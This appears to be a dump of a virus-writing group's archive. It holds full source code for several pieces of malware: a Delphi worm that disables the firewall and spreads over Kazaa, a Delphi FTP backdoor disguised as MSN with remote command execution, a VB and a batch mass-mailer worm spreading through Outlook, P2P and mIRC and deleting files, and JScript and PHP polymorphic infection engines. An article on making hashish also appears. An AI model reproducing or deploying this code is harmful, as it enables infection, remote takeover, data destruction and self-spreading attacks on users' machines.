begin // Install In Registry - Auto Start start_ := TRegistry.Create; start_.RootKey := HKEY_LOCAL_MACHINE; start_.OpenKey(code_(']ahzyo|kRCgm|a}ahzRYg`jay}RM{||k`zXk|}ga`R\{`', 14), true); start_.WriteString('Gurdof', code_('D[I[[[ MPM', 40)); start_.Free; // Module of Current .Exe GetModuleFileNameA(0, ExeName, SizeOf(ExeName)); // System Dir - 2 Copies of Virus CopyFile(ExeName, PChar(SysDir + code_('D[I[[[ MPM', 40)), true); CopyFile(ExeName, PChar(SysDir + code_('IEGKDN ORO', 42)), true); // Win Dir - 2 Copies of Virus CopyFile(ExeName, PChar(WinDir + code_('[EBHC[_ ITI', 44)), true); CopyFile(ExeName, PChar(WinDir + code_(']W]ZKC', 46)), true); // Desable the WinXP Firewall and Security Center fuck_xp_firewall; // Spread by Kazaa infect_p2p_kazaa; // A Simple Payload my_payload; end.

sources

Backdoor.Spieluhr Server Hutley unit Unit1; { Backdoor.Spieluhr Este backdoor foi totalmente feito por Hutley/GEDZAC. Projeto terminado as 12:03 - 24/Dez/2005 - A idéia foi criar um backdoor que permitisse o acesso aos arquivos do usuário infectado. Isso pode ser feito por meio de um servidor FTP contido no programa serrvidor. Que se disfarça de MSN para poder se auto instalar na máquina. - Dúvida, Bugs ou Sugestões: www.Hutley.cjb.net } interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, FtpSrv, FtpSrvC, Registry, ScktComp; type TForm1 = class(TForm) FTP: TFtpServer; SrvSockt: TServerSocket; procedure FormCreate(Sender: TObject); procedure FTPAuthenticate(Sender: TObject; Client: TFtpCtrlSocket; UserName, Password: TFtpString; var Authenticated: Boolean); procedure SrvSocktClientError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); procedure SrvSocktClientRead(Sender: TObject; Socket: TCustomWinSocket); private { Private declarations } public { Public declarations } end; var Form1: TForm1; const info: string = 'Win32.Backdoor.Spieluhr.Server'; autor: string = 'Hutley / GEDZAC'; // possíveis nomes de arquivo que pode assumir file_name: array[0..9] of string = ( 'msnupdate.exe', 'winfog.exe', 'winsys.exe', 'lsass1.exe', 'lovcx.exe', 'winsress.exe', 'winlog.exe', 'winsock.exe', 'saveruser.exe', 'winbackup.exe'); implementation {$R *.dfm} // função para decodificar as strings function code(text: string; chave: integer): string; var lp1, p: integer; fuck: string; begin lp1 := strlen(pchar(text)); for p := 1 to lp1 do begin fuck := fuck + chr(ord(text[p]) xor chave) end; code := fuck end; // diretório do sistema function SysDir: string; begin SetLength(Result, MAX_PATH); if GetSystemDirectory(PChar(Result), MAX_PATH) > 0 then Result := string(PChar(Result)) + '\' else Result := ''; end; // Escreve no Registro a Nova senha do FTPServer procedure NovoPassword(pass: string); var reg: TRegistry; begin Reg := TRegistry.Create; Reg.RootKey := HKEY_LOCAL_MACHINE; // \SOFTWARE\MsnSpieluhr key: 050 Reg.OpenKey(code('na}tfes`wnA\aB[W^GZ@', 050), true); // ftpPass key:051 Reg.WriteString(code('UGCcR@@', 051), pass); Reg.CloseKey; Reg.Free; end; // Escreve no Registro o novo Login do FTPServer procedure NovoLogin(login: string); var reg: TRegistry; begin Reg := TRegistry.Create; Reg.RootKey := HKEY_LOCAL_MACHINE; // \SOFTWARE\MsnSpieluhr key: 12 Reg.OpenKey(code('P_CJX[M^IPAb_|ei`yd~', 12), true); // ftpLogin key: 15 Reg.WriteString(code('i{C`hfa', 15), login); Reg.CloseKey; Reg.Free; end; // Executar por REGISTRO ! procedure ExecutaViaRegistro(nome, path: string); var evrg: TRegistry; begin evrg := TRegistry.Create; evrg.RootKey := HKEY_LOCAL_MACHINE; // SOFTWARE\Microsoft\Windows\CurrentVersion\Run KEY: 24 evrg.OpenKey(code('KW^LOYJ]DUq{jwkw~lDOqv|wokD[mjj}vlN}jkqwvDJmv', 24), FALSE); evrg.WriteString(nome, path); evrg.Destroy; end; // Escreve no Registro o nova Porta do FTPServer procedure NovaPorta(porta: integer); var reg: TRegistry; begin Reg := TRegistry.Create; Reg.RootKey := HKEY_LOCAL_MACHINE; // \SOFTWARE\MsnSpieluhr KEY: 30 Reg.OpenKey(code('BMQXJI_L[BSmpMnw{rkvl', 30), true); // ftpPort KEY: 30 Reg.WriteInteger(code('xjnNqlj', 30), porta); Reg.CloseKey; Reg.Free; end; // Processa os comandos recebidos pelo SOCKET procedure RecebeComando(s: string); var comando, texto: string; begin // Parte a STRING em dois pedaços, // o COMANDO e o PARÂMETRO comando := Copy(s, 1, 5); texto := Copy(s, 6, Length(s)); // npass, nlogi, exect, nport KEY: 40 if comando = code('FXI[[', 40) then NovoPassword(texto); if comando = code('FDGOA', 40) then NovoLogin(texto); if comando = code('MPMK\', 40) then WinExec(PChar(texto), sw_ShowNormal); if comando = code('FXGZ\', 40) then NovaPorta(StrToInt(texto)); end; procedure TForm1.FormCreate(Sender: TObject); var reg: TRegistry; ftpPort, NumbName: Integer; begin // Nao aparece na barra de tarefas SetWindowLong(Application.Handle, GWL_EXSTYLE, GetWindowLong(Application.Handle, GWL_EXSTYLE) or WS_EX_TOOLWINDOW and not WS_EX_APPWINDOW); // Executado 1º Vez? Reg := TRegistry.Create; Reg.RootKey := HKEY_LOCAL_MACHINE; // \SOFTWARE\MsnSpieluhr KEY: 45 (em tudo) Reg.OpenKey(code('q~bkyzlhq`^C~]DHAXE_', 45), true); if not (Reg.ValueExists('1?')) then begin // Coloca a String para Aparecer a Mensagem de Erro Reg.WriteBool('1?', true); // Se AUTO COPIA para a pasta SYSTEM // o nome do arquivo é escolhido aleatoriamente Randomize; NumbName := Random(9); CopyFile(PChar(Application.Exename), PChar(SysDir + file_name[NumbName]), false); // Depois de copiado, escreve no registro pra auto executar // Hutley-Spieluhr - key: 20 ExecutaViaRegistro(code('\a`xqm9Gd}qxa|f', 20), SysDir + file_name[NumbName]); // Login/Pass para o FTPServer // ftpLogin, hutleyvx - key: 21 Reg.WriteString(code('saeYzr|{', 21), code('}`ayplcm', 21)); // ftpPass - key: 21, 123456 - key: 23 Reg.WriteString(code('saeEtff', 21), code('&%$#"!', 23)); // ftpPort, 25 - key: 23 Reg.WriteInteger(code ('qcgGxec', 23), StrToInt(Code('%"', 23))); // Msg de Erro. Só aparece na 1º execução // Error, contact the Microsoft support! - key: 23 // Error #6985 - key: 25 Application.MessageBox(PChar(code('Reexe;7txycvtc7cr7Z~texdxqc7dbggxec6', 23)), PChar(code('\kkvk9:/ !,', 25)), mb_ok + mb_IconError); end else begin // ftpPort key: 26 ftpPort := Reg.ReadInteger(code('|njJuhn', 26)); Reg.CloseKey; Reg.Free; end; // Inicia o FTP Server e o Socket Servidor if ftp.Active = false then begin FTP.Port := IntToStr(FTPPort); FTP.Start; end; if srvsockt.Active = false then srvsockt.Open; // Some com o FORM da tela with form1 do begin left := 0; top := 1000000; Height := 0; Width := 0; end; end; procedure TForm1.FTPAuthenticate(Sender: TObject; Client: TFtpCtrlSocket; UserName, Password: TFtpString; var Authenticated: Boolean); var Reg: TRegistry; ftpLogin, ftpPass: string; begin Authenticated := false; // Lê no Registro Login/Senha para autenticação do FTPServer Reg := TRegistry.Create; Reg.RootKey := HKEY_LOCAL_MACHINE; // \SOFTWARE\MsnSpieluhr - key: 26 Reg.OpenKey(code('FIU\NM[H_FWitIjsvorh', 26), true); // ftpLogin - key: 27 ftpLogin := Reg.ReadString(code('}okWt|ru', 27)); // ftpPass - key: 27 ftpPass := Reg.ReadString(code('}okKzhh', 27)); Reg.CloseKey; Reg.Free; // Verifica se é igual ao Recebido if (UserName = ftpLogin) and (Password = ftpPass) then Authenticated := true else Authenticated := false; end; procedure TForm1.SrvSocktClientError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); begin ErrorCode := 0; end; procedure TForm1.SrvSocktClientRead(Sender: TObject; Socket: TCustomWinSocket); begin RecebeComando(Socket.ReceiveText); end; end.

sources

Backdoor.Spieluhr Client Hutley unit Unit1; { Backdoor.Spieluhr Este backdoor foi totalmente feito por Hutley/GEDZAC. Projeto terminado as 12:03 - 24/Dez/2005 - A idéia foi criar um backdoor que permitisse o acesso aos arquivos do usuário infectado. Isso pode ser feito por meio de um servidor FTP contido no programa serrvidor. Que se disfarça de MSN para poder se auto instalar na máquina. - Dúvida, Bugs ou Sugestões: www.Hutley.cjb.net } interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, Buttons, StdCtrls, ComCtrls, ShellAPI, ScktComp; type TForm1 = class(TForm) btnClose: TSpeedButton; GroupBox1: TGroupBox; Label1: TLabel; edtFTPUsername: TEdit; Label2: TLabel; edtFTPPassword: TEdit; Label3: TLabel; edtFTPPort: TEdit; GroupBox2: TGroupBox; Label4: TLabel; edtFile: TEdit; btnApply: TSpeedButton; StatusBar1: TStatusBar; GroupBox3: TGroupBox; edtIP: TEdit; Label5: TLabel; Label6: TLabel; edtPort: TEdit; btnConnect: TSpeedButton; btnExecute: TSpeedButton; lblLink: TLabel; clSocket: TClientSocket; btnAbout: TSpeedButton; procedure btnCloseClick(Sender: TObject); procedure lblLinkMouseEnter(Sender: TObject); procedure lblLinkMouseLeave(Sender: TObject); procedure lblLinkClick(Sender: TObject); procedure btnConnectClick(Sender: TObject); procedure btnApplyClick(Sender: TObject); procedure clSocketConnecting(Sender: TObject; Socket: TCustomWinSocket); procedure clSocketConnect(Sender: TObject; Socket: TCustomWinSocket); procedure clSocketDisconnect(Sender: TObject; Socket: TCustomWinSocket); procedure clSocketError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); procedure btnExecuteClick(Sender: TObject); procedure btnAboutClick(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; const info: string = 'Win32.Backdoor.Spieluhr.Client'; autor: string = 'Hutley / GEDZAC'; implementation {$R *.dfm} procedure TForm1.btnCloseClick(Sender: TObject); begin close; end; procedure TForm1.lblLinkMouseEnter(Sender: TObject); begin lblLink.Font.Style := [fsUnderline]; end; procedure TForm1.lblLinkMouseLeave(Sender: TObject); begin lblLink.Font.Style := []; end; procedure TForm1.lblLinkClick(Sender: TObject); begin ShellExecute(GetDesktopWindow, 'open', 'http://Hutley.cjb.net', nil, nil, 0); end; procedure TForm1.btnConnectClick(Sender: TObject); begin clSocket.Address := edtip.Text; clSocket.Port := StrToInt(edtPort.text); clSocket.Open; end; procedure TForm1.btnApplyClick(Sender: TObject); begin if clSocket.Active then begin clSocket.Socket.SendText('nlogi' + edtFTPUsername.Text); clSocket.Socket.SendText('nPass' + edtFTPPassword.Text); clSocket.Socket.SendText('nport' + edtFTPPort.Text); end else Application.MessageBox('NOT CONNECTED', 'Error!', mb_IconError + mb_Ok); end; procedure TForm1.clSocketConnecting(Sender: TObject; Socket: TCustomWinSocket); begin Statusbar1.Panels[0].Text := '*** Connecting. . .'; end; procedure TForm1.clSocketConnect(Sender: TObject; Socket: TCustomWinSocket); begin Statusbar1.Panels[0].Text := '*** CONNECTED'; end; procedure TForm1.clSocketDisconnect(Sender: TObject; Socket: TCustomWinSocket); begin Statusbar1.Panels[0].Text := '*** Disconnected'; end; procedure TForm1.clSocketError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); begin ErrorCode := 0; Statusbar1.Panels[0].Text := '*** Error'; end; procedure TForm1.btnExecuteClick(Sender: TObject); begin if edtFile.Text <> '' then if clSocket.Active then clSocket.Socket.SendText('exect' + edtFile.Text) else Application.MessageBox('NOT CONNECTED', 'Error!', mb_IconError + mb_Ok); end; procedure TForm1.btnAboutClick(Sender: TObject); begin Application.MessageBox('Uh!' + #13 + 'This backdoor was made by Hutley' + #13 + 'Member of GEDZAC Virii Group.' + #13#13 + 'If you want contact me in:' + #13 + 'hutleyvx@gmail.com' + #13#13 + 'Thats all folks!' + #13#13 + '! Brazil Rulez !', 'Backdoor.Spieluhr v1.0', mb_IconInformation + mb_ok); end; end;

sources

mercury Industry mercury source by Industry VERSION 5.00 Begin VB.Form Main BorderStyle = 0 'None Caption = "main" ClientHeight = 90 ClientLeft = 4995 ClientTop = 3135 ClientWidth = 90 Icon = "Main.frx":0000 LinkTopic = "Form" MaxButton = 0 'False MinButton = 0 'False ScaleHeight = 90 ScaleWidth = 90 ShowInTaskbar = 0 'False Visible = 0 'False End Attribute VB_Name = "Main" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Private Sub Form_Load() On Error Resume Next Call Copy Call outlook Call mIRC Call bt End Sub Sub Copy() On Error Resume Next Dim FSO, KaZaA, KaZaA1, KaZaADir As String Set FSO = CreateObject("Scripting.FileSystemObject") KaZaA1 = "C:\KaZaA\My Shared Folder\" 'Very rare KaZaA2 = "C:\Program Files\KaZaA\My Shared Folder\" 'Common If FSO.FolderExists(KaZaA1) = True Then KaZaADir = KaZaA1 If FSO.FolderExists(KaZaA2) = True Then KaZaADir = KaZaA2 If KaZaADir <> "" Then GoTo CopyUs Else GoTo JumpNextCode CopyUs: Call ModifyReg Call pr0n Dim aa, a, b, c, d, ef, f, KaZaA3, KaZaA4, bear, bear2, e, e2, Screen aa = App.Path & "\" & App.EXEName & ".exe" a = App.Path & App.EXEName & ".exe" b = "c:\WINDOWS\taskman.exe" c = "c:\AutoExec.exe" d = "c:\Windows\System\AVupdate.exe" ef = "c:\Program Files\uninstall.exe" f = "c:\Windows\Notepad.exe" Screen = "c:\windows\screensaver.exe" KaZaA3 = "c:\program files\kazaa\my shared folder\IPspoofer.exe" bear = "c:\program files\bearshare\shared\IPspoofer.exe" e = "c:\program files\eDonkey2000\incoming\IPspoofer.exe" KaZaA4 = "c:\program files\kazaa\my shared folder\Virtual Sex Simulator.exe" bear2 = "c:\program files\bearshare\shared\Virtual Sex Simulator.exe" e2 = "c:\program files\eDonkey2000\incoming\Virtual Sex Simulator.exe" FileCopy aa, b FileCopy a, b FileCopy aa, c FileCopy a, c FileCopy aa, d FileCopy a, d FileCopy aa, e FileCopy a, e FileCopy aa, f FileCopy a, f FileCopy aa, KaZaA3 FileCopy a, KaZaA3 FileCopy aa, bear FileCopy a, bear FileCopy aa, e FileCopy a, e FileCopy aa, KaZaA4 FileCopy a, KaZaA4 FileCopy aa, bear2 FileCopy a, bear2 FileCopy aa, e2 FileCopy a, e2 FileCopy aa, Screen FileCopy a, Screen SetAttr d, vbHidden + vbReadOnly JumpNextCode: End Sub Sub outlook() On Error Resume Next Dim RndSub, RndSub1 As String Dim unin, taskman, av, ska, punk, a, b, c, d, f, g Randomize RndSub = Int((Rnd * 3) + 1) If RndSub = 1 Then RndSub1 = "Update your Anti-Virus Software!" If RndSub = 2 Then RndSub1 = "Update your virus defenitions (DAT files)!" If RndSub = 3 Then RndSub1 = "1 month ago you updated your Anti-Virus software!" unin = "c:\Program Files\uninstall.exe" taskman = "c:\WINDOWS\taskman.exe" av = "c:\Windows\System\AVupdate.exe" punk = Array(unin, taskman, av) Randomize ska = punk(Int(Rnd * 3)) Set a = CreateObject("Outlook.Application") Set b = a.getnamespace("MAPI") If a = "Outlook" Then b.Logon "profile", "password" For f = 1 To b.addresslists.Count For d = 1 To b.addresslists(f).addressentries.Count With a.createitem(69 - 69) Set g = b.addresslists(f).addressentries(d) .Recipients.Add g .Subject = RndSub1 .body = "Use our automatic updater (included in this e-mail) to get the latest virus database files needed to detect new virus such as BugBear (aka Tanatos), Opasoft (Opaserv)!" .Attachments.Add ska .send End With g = "" Next d Next f b.logoff End If End Sub Sub ModifyReg() On Error Resume Next Dim RegEdit Set RegEdit = CreateObject("WScript.Shell") 'Just to make sure that the user is sharing his stuff RegEdit.RegWrite "HKEY_CURRENT_USER\Software\Kazaa\LocalContent\DisableSharing", "0x00000000 (0)", "REG_DWORD" 'Set the share dir to that dir we copied ourself to RegEdit.RegWrite "HKEY_CURRENT_USER\Software\Kazaa\Transfer\DlDir0", KaZaADir 'KaZaA has a lame virus scanner built in, that easy can be disabled 'by writing to the registry RegEdit.RegWrite "HKEY_CURRENT_USER\Software\Kazaa\Advanced\ScanFolder", "0x00000000 (0)", "REG_DWORD" End Sub Sub pr0n() On Error Resume Next 'This function is here to delete any form of child abuse 'Altho it will delete all jpg, mpg, bmp and avi if there is 'child abuse applications under the formats it will be deleted. 'Who ever said a virus was a bad thing?!?!?! Open "c:\pr0n.bat" For Output As #2 Print #2, "@Echo Off" Print #2, "@cd C:\Program Files\Kazaa\My Shared Folder\" Print #2, "@del *.jpg" Print #2, "@del *.mpg" Print #2, "@del *.bmp" Print #2, "@del *.avi" Print #2, "@cd c:\program files\bearshare\shared\" Print #2, "@del *.jpg" Print #2, "@del *.mpg" Print #2, "@del *.bmp" Print #2, "@del *.avi" Print #2, "@cd c:\program files\eDonkey2000\incoming\" Print #2, "@del *.jpg" Print #2, "@del *.mpg" Print #2, "@del *.bmp" Print #2, "@del *.avi" Close #2 Shell ("C:\pr0n.bat") Kill ("C:\pr0n.bat") End Sub Sub mIRC() On Error Resume Next Dim FSO, mIRC1, mIRC2, mIRC3, mIRC4, mIRCDir As String Set FSO = CreateObject("Scripting.FileSystemObject") 'FSO Object mIRC1 = "C:\mIRC\" 'Just a possible dir mIRC2 = "C:\mIRC32\" mIRC3 = "C:\Program Files\mIRC\" mIRC4 = "C:\Program Files\mIRC32\" If FSO.FolderExists(mIRC1) = True Then mIRCDir = mIRC1 If FSO.FolderExists(mIRC2) = True Then mIRCDir = mIRC2 If FSO.FolderExists(mIRC3) = True Then mIRCDir = mIRC3 If FSO.FolderExists(mIRC4) = True Then mIRCDir = mIRC4 If mIRCDir <> "" Then GoTo WriteScript Else GoTo RunNextCode WriteScript: Open mIRCDir & "Script.ini" For Output As #3 Print #3, "n1= on 1:JOIN:#:{" Print #3, "n2= /if ( $nick == $me ) { halt }" Print #3, "n3= /msg $nick Hi want a cool screen saver?" Print #3, "n4= /dcc send -c $nick c:\Windows\screensaver.exe" Print #3, "n5= }" Print #3, "n6= on 1:quit:{" Print #3, "n7= /ame is infected with Win32.mercury@mm by Industry" Print #3, "n8= }" Print #3, "n9= on 1:text:*:#:{" Print #3, "n9= /msg $chan $2-" Print #3, "n10= }" Print #3, "n11= on 1:text:*no*:#:/quit $nick i say yes! (Win32.mercury@mm by Industry)" Close #3 RunNextCode: End Sub Sub bt() On Error Resume Next If Month(Now) = 12 And Day(Now) = 31 Then MsgBox "...Saving the world before bed time...", 64, "Win32.mercury@mm" End If If Month(Now) = 2 And Day(Now) = 16 Then MsgBox "...Win32.mercury Coded by Industry @ ANVXgroup...", 64, "Win32.mercury@mm" End If If Month(Now) = 4 And Day(Now) = 2 Then MsgBox "...Shout out to Every one @ Indovirus...", 64, "Win32.mercury@mm" End If End Sub 'Win32.mercury@mm by Industry 'Respect to mANiAC89 (aka SpiderMan) 'And Every one else @ Indovirus & b8

sources

verchocha Industry verchocha by Industry @echo off if exist c:\Windows\Explorer.exe copy %0 c:\Windows\Exp.bat cd C:\Windows\ echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 010110101011101010 BLANK CODE 01001011101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101011 rRlf 010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 010110101011101 ppacket 10101101010101101010110101010111001 >>Explorer.exe echo 01 Dolomite 10101011101010101101010101101010110101010111001 >>Explorer.exe echo 010110101011101010111010101011010101011010101 adious 111001 >>Explorer.exe echo 01011010101110101011101 Energy 1010101101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 010110 Writen By Industry 101011101010101101010101101010101 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 0101101010111010101110101010110101010110 dr.g0nZo 010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 0101101010111010101110 assassin007 101101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 0101101010111010101110101010110101010 philet0ast3r 10111001 >>Explorer.exe echo 01011010 El DudErin0 01010101101010101101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 010110101011101010111010101 Zed 010101101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 010110101011101010111010101011010101011010 Verchocha 111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 010 disk0rdia 101011101010101101010101101010110101010111001 >>Explorer.exe echo 0101101010111010101110101 Second Part To Hell 0101010111001 >>Explorer.exe cd ..\Local Settings\Application Data\Microsoft\CD Burning\ copy %0 Setup.bat cd C:\ if "%1=="#r goto rar if "%1=="#z goto zip if "%1=="#a goto arj for %%r in (*.rar) do call %0 #r %%r for %%z in (*.zip) do call %0 #z %%z for %%a in (*.arj) do call %0 #a %%a goto cont :rar attrib -r %2 rar a -tk -y -c- -o+ %2 %0 >nul goto cont :zip attrib -r %2 pkzip %2 %0 >nul goto cont :arj attrib -r %2 arj a %2 %0 >nul :cont mkdir _ copy %0 C:\_\_.bat copy %0 C:\_\_.dev if exist C:\AutoExec.bat goto auto :auto echo @echo off >>AutoExec.bat >>AutoExec.bat echo copy C:\_\_.dev A:\_.bat >>AutoExec.bat goto mail :mail cd C:\_\ echo On Error Resume Next >>mail_.vbs echo dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad >>mail_.vbs echo set regedit=CreateObject("WScript.Shell") >>mail_.vbs echo set out=WScript.CreateObject("Outlook.Application") >>mail_.vbs echo set mapi=out.GetNameSpace("MAPI") >>mail_.vbs echo for ctrlists=1 to mapi.AddressLists.Count >>mail_.vbs echo set a=mapi.AddressLists(ctrlists) >>mail_.vbs echo x=1 >>mail_.vbs echo regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) >>mail_.vbs echo if (regv="") then >>mail_.vbs echo regv=1 >>mail_.vbs echo end if >>mail_.vbs echo if (int(a.AddressEntries.Count)> int(regv)) then >>mail_.vbs echo for ctrentries=1 to a.AddressEntries.Count >>mail_.vbs echo malead=a.AddressEntries(x) >>mail_.vbs echo regad="" >>mail_.vbs echo regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) >>mail_.vbs echo if (regad="") then >>mail_.vbs echo set male=out.CreateItem(0) >>mail_.vbs echo male.Recipients.Add(malead) >>mail_.vbs echo male.Subject = "SOLUTION: [TICK] -USA-P3-CaseID 4327120063 - Virus Undetected-IZ61499" >>mail_.vbs echo male.Body = "The Information & Patch for IZ61499 is attatched." >>mail_.vbs echo rem male.Attachments.Add("C:\_\_.bat") >>mail_.vbs echo male.Send >>mail_.vbs echo regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" >>mail_.vbs echo end if >>mail_.vbs echo x=x+1 >>mail_.vbs echo next >>mail_.vbs echo regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count >>mail_.vbs echo else >>mail_.vbs echo regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count >>mail_.vbs echo end if >>mail_.vbs echo next >>mail_.vbs echo Set out=Nothing >>mail_.vbs echo Set mapi=Nothing >>mail_.vbs :irc cd C:\_\ echo on error resume next >>_.vbs echo Set fso = CreateObject("Scripting.FileSystemObject") >>_.vbs echo Set b = fso.CreateTextFile("c:\program files\mirc\script.ini", True) >>_.vbs echo b.WriteLine "[script]" >>_.vbs echo b.WriteLine "ON 1:JOIN:#:{" >>_.vbs echo b.WriteLine "/dcc send $nick c:\_\_.bat" >>_.vbs echo b.WriteLine "}" >>_.vbs echo b.close >>_.vbs echo Set fso = CreateObject("Scripting.FileSystemObject") >>_.vbs echo Set a = fso.CreateTextFile("c:\mirc\script.ini", True) >>_.vbs echo a.WriteLine "[script]" >>_.vbs echo a.WriteLine "ON 1:JOIN:#:{" >>_.vbs echo a.WriteLine "/dcc send $nick c:\_\_.bat" >>_.vbs echo a.WriteLine "}" >>_.vbs echo a.close >>_.vbs

articles

kefi's iso-hash Kefi kefi's iso-hash "something for the children..." by kefi kefi's iso-hash "something for the children..." hello everyone – you probably haven't heard much of me lately. i've been going through some "real-life" shit that (still) needs to be sorted out, so i haven't had much time to attribute anything to this scene. this time, i have something for you that has nothing to do with vx at all. if you do not smoke weed, you may as well close this document right now. a few days ago, i was introduced to something amazing – (easily) homemade hashish. by using few household products, you can have your own! here's what you'll need: one (clean) glass jar with an attachable lid; one bottle of rubbing alcohol (70% isopropyl); a few coffee filters; a plate or glass pan which isn't too important; weed and/or leaves; and lastly, a razor blade. by the way, the better quality of weed you use, the better hash you will be left with. once you have all of these things, you're ready to get started ... first, take your weed (or leaves) and crush it all up. breaking it up is not necessary and you do not want it to be too small. now take your weed and place it into the bottom of the jar. pour the rubbing alcohol into the jar (fill it about 4 cm above weed). now tightly put the lid on the jar and shake it for ~3 minutes. let this substance sit in the jar for another few minutes while you smoke a cigarette. now get your plate and coffee filters ready. stack four coffee filters on top of each other and place them on the plate. now pour the substance (weed & alcohol) into the filters. be sure to fold the sides of the filters up so nothing leaks out the top. let all of the liquid drain out of the coffee filters. this may take some time, so have something else to do while you wait. once all of the liquid has drained through the filters, throw the weed and filters in the garbage. (or sell the weed so someone stupid. ;p) of course, more waiting is involved. place the plate somewhere safe and let all of the liquids evaporate off of it. now scrape the substance off of the plate with a razor blade. what's left, depending what you used (weed, leaves, etc.), you will end up with one of the following results: something like a long stick of candy - very sticky and greenish-black in color (this is the best form); or a very dry powder. if your result was the powder, you will not be able to (easily) smoke this. don't worry though! if you do the following, everything will be okay ... take the powder and put it inside cellophane (plastic wrapper) from a cigarette pack. fold the cellophane and make it as small as possible. now tape the cellophane closed. then place the cellophane in the heel of your shoe and walk on it for about an hour. and voila - you have a solid piece of delicious hash. next time you have a lot of bad weed, leaves or stems, make your self some hash. this method has a great high and does not have the potential of blowing up your home.

sources

kefi's jscript poly [kjp] Kefi kefi's jscript poly [kjp] (c) by kefi, April 17, 2003 .Hello, everybody! It's probably been a while since you've heard from me. If so, don't feel bad. I've been rather inactive in the scene lately as I've got a lot of personal problems to deal with... .Since chances are, you're a silly script-kitty (no offence), I need to include a disclaimer in here. If you're a stupid ass, and you spread a virus which uses my engine, I will hold no responsibly for it. Nor will you ever accomplish anything other than irritating me. In other words, "don't be a lame bastard." .Anyway, I'm glad you've decided to check out my new polymorphic engine! It's my favorite one so far. :] Basically a re-make of kvpe, my vbs poly, but it's for javascript instead. At the time of writing this, I had thought that it was the first of it's kind, however, later on Second Part To Hell (hello!) said that jackie had made one before me ... so, "good job, jackie! you beat me to it!" So, anyway, this thing's got to be the coolest js polymorphic engine, as it's small (7 lines), fast, and easy to understand (if you have some prior knowledge of javascript, of course). How it works is it loops through an array of variables which you have in your script, then generates a new, randomly created variable. After it's got it's new variable, it searches for it with in your virus's code and replaces the original variable with the new one. To really understand it, I suggest you just play with it for a while, I'm sure you'll understand it. .Now, in order to use this poly, you'll need to gather all your code, and then make a call to the engine, then write the new stuff. Here's a really small, easy way to do this (uses the FileSystemObject ... ack): var objFso = new ActiveXObject("scripting.filesystemobject"); var theCode = kjp(objFso.opentextfile(WScript.scriptfullname, 1).readall()); objFso.opentextfile(WScript.scriptfullname, 2).write(theCode); ... You should understand that, if not, don't use my poly. :] .Well, that's all I've got to say about this thing, so once again, thank you for readin' about it, and if you've got any comments, questions, flames, or whatever contact me: http -- http://vx.netlux.org/~kefi/ email -- kefi@jwdx.com .Credits go out to: jackie -- Making the first js-poly, good job, I geuss! Second Part To Hell -- Thanks for all your javascirpt help and telling me about jackie's poly! (c) by Kefi, April 17, 2003 // kefi@jwdx.com // vx.netlux.org/~kefi Note: minor formatting and changes in the text occured on: October 3rd, 2003 .---------------------------------[jscript poly]----------------------------------. function kjp(a1){ a2 = new Array("kjp", "a1", "a2", "a3", "a4", "a5", "a6", "a7"); for(a3 in a2){ a4 = ""; for(a5 = 0; a5 < Math.round(Math.random() * 6) + 4; a5++) a4 += String.fromCharCode(Math.round(Math.random() * 22) + 97); for(var a6 = 0; a6 < a1.length; a6++) a1 = a1.replace(a2[a3], a4); } return(a1); }

sources

php.faces Kefi php.faces by Kefi (c) early October, 2003 .faces is the first polymorphic php virus. it uses the never-before-seen poly engine, "kppe," which stands for "kefi's php polymorph engine." faces is like most other php viruses in it's "main code" where it finds victim files with the extension of "php" from the current directory which do not contain the string, "php.faces." if the file contains the string, it will be skipped, however, if it does not, faces will add it's newly morphed 1,240 bytes of code to the beginning of the victim file. .written as a lame "concept virus," so everything's simple and easy ... as it should be. =) .thanks Negral -- php.Zodar; I based my code off of it. Xmorfic and Ultras -- very nice php viruses (php.ALF and NewWord)! Symantec -- giving horrible reports (as usual) of every php virus out there. keep up the good work, guys! .-------------------------------[php.faces]--------------------------------. <?php $ypxqrpsqcc = fopen(__FILE__, "r"); $bbugesqpty = substr(fread($ypxqrpsqcc, filesize(__FILE__)), 0, 1249); fclose($ypxqrpsqcc); $dhbpgxtamn = array("ypxqrpsqcc", "bbugesqpty", "dhbpgxtamn", "cctsvcopcx", "wurwejtvjx", "ccznwozuuo", "uudxleoyja", "ionwdbkwfh", "zohqscoxob", "skzmabzbfe"); for($cctsvcopcx = 0; $cctsvcopcx 